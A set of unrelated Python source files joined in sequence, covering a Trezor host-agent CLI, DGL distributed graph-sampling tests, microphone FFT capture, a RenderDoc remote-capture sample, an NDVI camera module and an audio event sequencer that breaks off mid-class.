"--trezor",
dest="trezor",
default=True,
action="store_const",
const=True,
help="Use Trezor connector",
)
parser.add_argument(
"--trezor-path", dest="trezor_path", default=None, help="Trezor path"
)
parser.add_argument(
"--poc",
dest="poc",
default=False,
action="store_const",
const=True,
help="Use PoC Trezor emulation",
)
parser.add_argument(
"--patch-client",
dest="patch_client",
default=False,
action="store_const",
const=True,
            help="Monkey patching of the Trezor client",
)
parser.add_argument(
"--no-init",
dest="no_init",
default=False,
action="store_const",
const=True,
help="Do not require device initialization",
)
args_src = sys.argv
self.args = parser.parse_args(args=args_src[1:])
if self.args.rpc_addr:
if not re.match(r"^\[?([.0-9a-f:]+)\]?(:[0-9]+)?$", self.args.rpc_addr):
                logger.error("Invalid daemon address: %s" % self.args.rpc_addr)
return -1
sys.argv = [args_src[0]]
res = await self.entry()
sys.argv = args_src
return res
async def amain():
agent = HostAgent()
res = await agent.main()
sys.exit(res)
def main():
loop = asyncio.get_event_loop()
loop.run_until_complete(amain())
# loop.run_forever()
loop.close()
if __name__ == "__main__":
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors, find_edges
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = find_edges(dist_graph, eids)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_find_edges'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(eids)
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait for the non-shared-memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt", 1)
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_find_edges(Path(tmpdirname), 2)
check_rpc_find_edges(Path(tmpdirname), 1)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my github for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
def getFFT(data,rate):
"""Given some data and rate, returns FFTfreq and FFT (half)."""
data=data*np.hamming(len(data))
fft=np.fft.fft(data)
fft=np.abs(fft)
#fft=10*np.log10(fft)
freq=np.fft.fftfreq(len(fft),1.0/rate)
return freq[:int(len(freq)/2)],fft[:int(len(fft)/2)]
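# A minimal sketch (not part of the original file) showing how getFFT above can be
# exercised on a synthetic tone; the 44100 Hz rate, 4096-sample chunk and 1 kHz
# frequency are arbitrary example values.
def _getFFT_demo():
    rate = 44100
    t = np.arange(4096) / rate
    tone = np.sin(2 * np.pi * 1000.0 * t)  # 1 kHz test signal
    freqs, spectrum = getFFT(tone, rate)
    # the strongest bin should land close to 1000 Hz
    print("peak at %.1f Hz" % freqs[np.argmax(spectrum)])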
class SWHear():
"""
    The SWHear class provides access to continuously recorded
(and mathematically processed) microphone data.
Arguments:
device - the number of the sound card input to use. Leave blank
to automatically detect one.
rate - sample rate to use. Defaults to something supported.
        updatesPerSecond - how fast to record new data. Note that smaller
        numbers mean larger chunks (more samples per read), which gives finer
        frequency resolution if an FFT is applied later
"""
def __init__(self,device=None,rate=None,updatesPerSecond=10):
self.p=pyaudio.PyAudio()
self.chunk=4096 # gets replaced automatically
self.updatesPerSecond=updatesPerSecond
self.chunksRead=0
self.device=device
self.rate=rate
self.data = None # will fill up with threaded recording data
self.fft = None
### SYSTEM TESTS
def valid_low_rate(self,device):
"""set the rate to the lowest supported audio rate."""
for testrate in [44100]:
if self.valid_test(device,testrate):
return testrate
print("SOMETHING'S WRONG! I can't figure out how to use DEV",device)
return None
def valid_test(self,device,rate=44100):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info=self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"]>0:
return False
#print("Testing Device ",device,"\n------------------")
#for key, value in self.info.items(): # dct.iteritems() in Python 2
# print("{} ({})".format(key, value))
#print("")
stream=self.p.open(format=pyaudio.paInt16,channels=1,
input_device_index=device,frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]),input=True)
stream.close()
return True
except Exception as E:
#print("DEVICE INVALID:")
#print(E,"\n"*3)
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
        Call this before starting a stream to pick a usable input device.
"""
mics=[]
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics)==0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s"%(len(mics),mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device=self.valid_input_devices()[0] #pick the first one
if self.rate is None:
self.rate=self.valid_low_rate(self.device)
        self.chunk = int(self.rate/self.updatesPerSecond) # hold 1/updatesPerSecond seconds of audio per chunk
if not self.valid_test(self.device,self.rate):
print("Guessing a valid microphone device/rate...")
self.device=self.valid_input_devices()[0] #pick the first one
self.rate=self.valid_low_rate(self.device)
self.datax=np.arange(self.chunk)/float(self.rate)
msg='recording from "%s" '%self.info["name"]
msg+='(device %d) '%self.device
msg+='at %d Hz'%self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording=False #the threads should self-close
while self.t.is_alive(): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
try:
            self.data = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
self.fftx, self.fft = getFFT(self.data,self.rate)
except Exception as E:
print(" -- exception! terminating...")
print(E,"\n"*5)
self.keepRecording=False
if self.keepRecording:
self.stream_thread_new()
else:
self.stream.close()
#self.p.terminate() #MM what if you want to restart? this doesnt seem right?
print(" -- stream STOPPED")
self.chunksRead+=1
def stream_thread_new(self):
self.t=threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" -- starting stream")
self.keepRecording=True # set this to False later to terminate stream
self.data=None # will fill up with threaded recording data
self.fft=None
self.dataFiltered=None #same
self.stream=self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.rate,input=True,frames_per_buffer=self.chunk)
self.stream_thread_new()
def stream_stop(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording=False #the threads should self-close
while self.t.is_alive(): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
if __name__=="__main__":
    ear=SWHear(updatesPerSecond=10) # optionally set sample rate here
ear.stream_start() #goes forever
lastRead=ear.chunksRead
loop = 5
while loop > 0:
loop = loop - 1
while lastRead==ear.chunksRead:
time.sleep(.01)
print(ear.chunksRead,len(ear.data))
lastRead=ear.chunksRead
ear.stream_stop()
print("DONE")
|
remote_capture.py
|
import renderdoc as rd
import threading
import time
# This sample is intended as an example of how to do remote capture and replay
# as well as using device protocols to automatically enumerate remote targets.
#
# It is not complete since it requires filling in with custom logic to select
# the executable and trigger the capture at the desired time
raise RuntimeError("This sample should not be run directly, read the source")
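# The rest of this sample references a few names you are expected to provide
# yourself before removing the RuntimeError above. The commented block below is
# only a hedged illustration of what those pieces might look like; none of it is
# part of the original sample and every value is a placeholder.
#
# protocol_to_use = None        # or e.g. "adb" to target Android devices
# hostname = "192.168.1.2"      # plain host used when no device protocol is chosen
#
# def select_executable():
#     # return (exe, workingDir, cmdLine, env, opts) as consumed by ExecuteAndInject below
#     ...
#
# def capture_condition():
#     # block until the application reaches the frame you want to capture
#     time.sleep(5)
#
# def sampleCode(controller):
#     # normal replay work with the ReplayController goes here
#     ...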
protocols = rd.GetSupportedDeviceProtocols()
print(f"Supported device protocols: {protocols}")
# Protocols are optional - they allow automatic detection and management of
# devices.
if protocol_to_use is not None:
# the protocol must be supported
if protocol_to_use not in protocols:
raise RuntimeError(f"{protocol_to_use} protocol not supported")
protocol = rd.GetDeviceProtocolController(protocol_to_use)
devices = protocol.GetDevices()
if len(devices) == 0:
raise RuntimeError(f"no {protocol_to_use} devices connected")
# Choose the first device
dev = devices[0]
name = protocol.GetFriendlyName(dev)
print(f"Running test on {dev} - named {name}")
URL = protocol.GetProtocolName() + "://" + dev
# Protocols can enumerate devices which are not supported. Capture/replay
# is not guaranteed to work on these devices
if not protocol.IsSupported(URL):
raise RuntimeError(f"{dev} doesn't support capture/replay - too old?")
# Protocol devices may be single-use and not support multiple captured programs
# If so, trying to execute a program for capture is an error
if not protocol.SupportsMultiplePrograms(URL):
# check to see if anything is running. Just use the URL
ident = rd.EnumerateRemoteTargets(URL, 0)
if ident != 0:
raise RuntimeError(f"{name} already has a program running on {ident}")
else:
# If you're not using a protocol then the URL can simply be a hostname.
# The remote server must be running already - how that is done is up
# to you. Everything else will work the same over a normal TCP connection
protocol = None
URL = hostname
# Let's try to connect
status,remote = rd.CreateRemoteServerConnection(URL)
if status == rd.ReplayStatus.NetworkIOFailed and protocol is not None:
# If there's just no I/O, most likely the server is not running. If we have
# a protocol, we can try to start the remote server
print("Couldn't connect to remote server, trying to start it")
status = protocol.StartRemoteServer(URL)
if status != rd.ReplayStatus.Succeeded:
raise RuntimeError(f"Couldn't launch remote server, got error {str(status)}")
# Try to connect again!
status,remote = rd.CreateRemoteServerConnection(URL)
if status != rd.ReplayStatus.Succeeded:
raise RuntimeError(f"Couldn't connect to remote server, got error {str(status)}")
# We now have a remote connection. This works regardless of whether it's a device
# with a protocol or not. In fact we are done with the protocol at this point
protocol = None
print("Got connection to remote server")
# GetHomeFolder() gives you a good default path to start with.
# ListFolder() lists the contents of a folder and can recursively
# browse the remote filesystem.
home = remote.GetHomeFolder()
paths = remote.ListFolder(home)
print(f"Executables in home folder '{home}':")
for p in paths:
print(" - " + p.filename)
# Select your executable, perhaps hardcoded or browsing using the above
# functions
exe,workingDir,cmdLine,env,opts = select_executable()
print(f"Running {exe}")
result = remote.ExecuteAndInject(exe, workingDir, cmdLine, env, opts)
if result.status != rd.ReplayStatus.Succeeded:
remote.ShutdownServerAndConnection()
raise RuntimeError(f"Couldn't launch {exe}, got error {str(result.status)}")
# Spin up a thread to keep the remote server connection alive while we make a capture,
# as it will time out after 5 seconds of inactivity
def ping_remote(remote, kill):
success = True
while success and not kill.is_set():
success = remote.Ping()
time.sleep(1)
kill = threading.Event()
ping_thread = threading.Thread(target=ping_remote, args=(remote,kill))
ping_thread.start()
# Create target control connection
target = rd.CreateTargetControl(URL, result.ident, 'remote_capture.py', True)
if target is None:
kill.set()
ping_thread.join()
remote.ShutdownServerAndConnection()
raise RuntimeError(f"Couldn't connect to target control for {exe}")
print("Connected - waiting for desired capture")
# Wait for the capture condition we want
capture_condition()
print("Triggering capture")
target.TriggerCapture(1)
# Pump messages, keep waiting until we get a capture message. Time out after 30 seconds
msg = None
start = time.monotonic()  # time.clock() was removed in Python 3.8
while msg is None or msg.type != rd.TargetControlMessageType.NewCapture:
msg = target.ReceiveMessage(None)
    if time.monotonic() - start > 30:
break
# Close the target connection, we're done either way
target.Shutdown()
target = None
# Stop the background ping thread
kill.set()
ping_thread.join()
# If we didn't get a capture, error now
if msg is None or msg.type != rd.TargetControlMessageType.NewCapture:
remote.ShutdownServerAndConnection()
raise RuntimeError("Didn't get new capture notification after triggering capture")
cap_path = msg.newCapture.path
cap_id = msg.newCapture.captureId
print(f"Got new capture at {cap_path} which is frame {msg.newCapture.frameNumber} with {msg.newCapture.api}")
# We could save the capture locally
# remote.CopyCaptureFromRemote(cap_path, local_path, None)
# Open a replay. It's recommended to set no proxy preference, but you could
# call remote.LocalProxies and choose an index.
#
# The path must be remote - if the capture isn't freshly created then you need
# to copy it with remote.CopyCaptureToRemote()
status,controller = remote.OpenCapture(rd.RemoteServer.NoPreference, cap_path, None)
if status != rd.ReplayStatus.Succeeded:
remote.ShutdownServerAndConnection()
    raise RuntimeError(f"Couldn't open {cap_path}, got error {str(status)}")
# We can now use replay as normal.
#
# The replay is tunnelled over the remote connection, so you don't have to keep
# pinging the remote connection while using the controller. Use of the remote
# connection and controller can be interleaved though you should only access
# them from one thread at once. If they are both unused for 5 seconds though,
# the timeout will happen, so if the controller is idle it's advisable to ping
# the remote connection
sampleCode(controller)
print("Shutting down")
controller.Shutdown()
# We can still use remote here - e.g. capture again, replay something else,
# save the capture, etc
remote.ShutdownServerAndConnection()
|
ndvi.py
|
import datetime
import time
import cv2
import numpy as np
import multiprocessing as mp
# set up matplotlib in such a way that it does not require an X server
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from imageio import imwrite
from astroplant_camera_module.misc.debug_print import d_print
from astroplant_camera_module.typedef import LC
# function used to obtain Polariks ndvi map
def truncate_colormap(cmap, minval=0.0, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list("trunc({n},{a:.2f},{b:.2f})".format(n=cmap.name, a=minval, b=maxval), cmap(np.linspace(minval, maxval, n)))
return new_cmap
class NDVI(object):
def __init__(self, *args, camera, **kwargs):
"""
        Initialize an object that contains the NDVI routines. Since this module is an extra module that can be loaded on top of a simple camera that just takes pictures, it is in a separate file.
:param camera: link to the camera object controlling these subroutines
"""
self.camera = camera
def ndvi_matrix(self):
"""
Internal function that makes the ndvi matrix from a red and a nir image. Pixel values are compared to the saved values from the calibration earlier in the process.
:return: ndvi matrix
"""
# capture images in a square rgb array
rgb_r, gain_r = self.camera.capture(LC.RED)
rgb_nir, gain_nir = self.camera.capture(LC.NIR)
# if an error is caught upstream, send it downstream
if rgb_r is None or rgb_nir is None:
return None
# crop the sensor readout
rgb_r = rgb_r[self.camera.settings.crop["y_min"]:self.camera.settings.crop["y_max"], self.camera.settings.crop["x_min"]:self.camera.settings.crop["x_max"], :]
r = rgb_r[:,:,0]
# apply flatfield mask
mask = self.camera.config["ff"]["value"]["red"]
Rr = 0.8*self.camera.config["ff"]["gain"]["red"]/gain_r*np.divide(r, mask)
# crop the sensor readout
rgb_nir = rgb_nir[self.camera.settings.crop["y_min"]:self.camera.settings.crop["y_max"], self.camera.settings.crop["x_min"]:self.camera.settings.crop["x_max"], :]
hsv = cv2.cvtColor(rgb_nir, cv2.COLOR_RGB2HSV)
v = hsv[:,:,2]
# apply flatfield mask
mask = self.camera.config["ff"]["value"]["nir"]
Rnir = 0.8*self.camera.config["ff"]["gain"]["nir"]/gain_nir*np.divide(v, mask)
# write image to file using imageio's imwrite
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "red_raw")
imwrite(path_to_img, r.astype(np.uint8))
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "nir_raw")
imwrite(path_to_img, v.astype(np.uint8))
#d_print("\tred max: " + str(np.amax(Rr)), 1)
#d_print("\tnir max: " + str(np.amax(Rnir)), 1)
#d_print("ground plane red avg: {}".format(np.mean(Rr[self.camera.settings.ground_plane["y_min"]:self.camera.settings.ground_plane["y_max"], self.camera.settings.ground_plane["x_min"]:self.camera.settings.ground_plane["x_max"]])), 1)
#d_print("ground plane nir avg: {}".format(np.mean(Rnir[self.camera.settings.ground_plane["y_min"]:self.camera.settings.ground_plane["y_max"], self.camera.settings.ground_plane["x_min"]:self.camera.settings.ground_plane["x_max"]])), 1)
#d_print("nir gain: {} ff value: {} ff gain: {}".format(gain_nir, self.camera.config["ff"]["value"]["nir"], self.camera.config["ff"]["gain"]["nir"]), 1)
#d_print("red gain: {} ff value: {} ff gain: {}".format(gain_r, self.camera.config["ff"]["value"]["red"], self.camera.config["ff"]["gain"]["red"]), 1)
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "red")
imwrite(path_to_img, np.uint8(255*Rr/np.amax(Rr)))
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "nir")
imwrite(path_to_img, np.uint8(255*Rnir/np.amax(Rnir)))
# finally calculate ndvi (with some failsafes)
Rr[Rnir < 0.1] = 0
Rnir[Rnir < 0.1] = 0
num = Rnir - Rr
den = Rnir + Rr
num[np.logical_and(den < 0.05, den > -0.05)] = 0.0
den[den < 0.05] = 1.0
ndvi = np.divide(num, den)
ndvi[0, 0] = 1.0
return ndvi
def ndvi_photo(self):
"""
Make a photo in the nir and the red spectrum and overlay to obtain ndvi.
        :return: result dict with the paths to the NDVI images and the average NDVI over pixels > 0.25 (0 if such pixels cover less than 2 percent of the image)
"""
# get the ndvi matrix
ndvi_matrix = self.ndvi_matrix()
# catch error
        if ndvi_matrix is None:
            curr_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
            res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
ndvi_matrix = np.clip(ndvi_matrix, -1.0, 1.0)
if np.count_nonzero(ndvi_matrix > 0.25) > 0.02*np.size(ndvi_matrix):
ndvi = np.mean(ndvi_matrix[ndvi_matrix > 0.25])
else:
ndvi = 0
rescaled = np.uint8(np.round(127.5*(ndvi_matrix + 1.0)))
ndvi_plot = np.copy(ndvi_matrix)
ndvi_plot[ndvi_plot<0.25] = np.nan
# write images to file using imageio's imwrite and matplotlibs savefig
d_print("Writing to file...", 1)
curr_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
# set multiprocessing to spawn (so NOT fork)
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
# write the matplotlib part in a separate process so no memory leaks
path_to_img_2 = "{}/cam/img/{}{}_{}.jpg".format(self.camera.working_directory, "ndvi", 2, curr_time)
p = mp.Process(target=plotter, args=(ndvi_plot, path_to_img_2,))
try:
p.start()
p.join()
except OSError:
d_print("Could not start child process, out of memory", 3)
res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
path_to_img_1 = "{}/cam/img/{}{}_{}.tif".format(self.camera.working_directory, "ndvi", 1, curr_time)
imwrite(path_to_img_1, rescaled)
res = dict()
res["contains_photo"] = True
res["contains_value"] = True
res["encountered_error"] = False
res["timestamp"] = curr_time
res["photo_path"] = [path_to_img_1, path_to_img_2]
res["photo_kind"] = ["raw NDVI", "processed NDVI"]
res["value"] = [ndvi]
res["value_kind"] = ["NDVI"]
res["value_error"] = [0.0]
return res
def ndvi(self):
"""
Take a photo in the NIR and the red spectrum and combine them to obtain NDVI.
:return: result dict with the average NDVI value
"""
# get the ndvi matrix
ndvi_matrix = self.ndvi_matrix()
# catch error
if ndvi_matrix is None:
curr_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
ndvi = np.mean(ndvi_matrix[ndvi_matrix > 0.2])
curr_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
res = dict()
res["contains_photo"] = False
res["contains_value"] = True
res["encountered_error"] = False
res["timestamp"] = curr_time
res["value"] = [ndvi]
res["value_kind"] = ["NDVI"]
res["value_error"] = [0.0]
return res
def plotter(ndvi, path_to_img):
# set the right colormap
cmap = plt.get_cmap("nipy_spectral_r")
Polariks_cmap = truncate_colormap(cmap, 0, 0.6)
plt.figure(figsize=(14,10))
plt.imshow(ndvi, cmap=Polariks_cmap)
plt.colorbar()
plt.title("NDVI")
plt.savefig(path_to_img)
time.sleep(2)
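# --- Illustrative NDVI sketch (not part of the camera pipeline) ----------------
# Minimal standalone example of the NDVI computation used in ndvi_matrix()
# above: NDVI = (NIR - R) / (NIR + R), with the same guard against a near-zero
# denominator. The reflectance values below are made up for illustration only.
import numpy as np

def ndvi_example():
    Rr = np.array([[0.1, 0.3], [0.6, 0.0]])    # hypothetical red reflectance
    Rnir = np.array([[0.5, 0.4], [0.7, 0.0]])  # hypothetical NIR reflectance
    num = Rnir - Rr
    den = Rnir + Rr
    num[np.abs(den) < 0.05] = 0.0  # zero out pixels with an unusable denominator
    den[den < 0.05] = 1.0
    return np.divide(num, den)     # values lie in [-1, 1]; vegetation tends towards 1

if __name__ == "__main__":
    print(ndvi_example())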
|
transport.py
|
import threading
import sounddevice as sd
import numpy as np
class NodeHandler:
"""
:param nodes: An array of nodes that should be played
:type nodes: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
"""
def __init__(self, nodes=None, fs=48000.0):
self.nodes = nodes if nodes is not None else []
self.fs = fs
def add_node(self, node):
"""
:param node: Node to add to the handler
"""
self.nodes.append(node)
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
:type sample: int
:returns: A PCM value representing all the nodes in the node handler mixed together
:rtype: float
"""
t = sample / self.fs
sample_value = 0.0
for node in self.nodes:
sample_value = node.get_sample(t) + sample_value
if len(self.nodes) > 0:
sample_value = sample_value / len(self.nodes)
return sample_value
class EventHandler:
"""
:param events: An array of events that should be handled
:type events: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
"""
def __init__(self, events, fs=48000.0):
self.events = events
self.fs = fs
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
:type sample: int
"""
t = sample / self.fs
for event in self.events:
if sample % event.sample_freq == 0:
event.get_event(t)
class EventSequencer:
"""
:param events: An array of events that should be handled
:type events: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
:param sequence: An array of sample values at which events should be fired
:type sequence: array(int)
"""
def __init__(self, events, fs=48000.0, sequence=None):
self.events = events
self.fs = fs
self.count = 0
self.pos = 0
self.sequence = sequence if sequence is not None else []
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
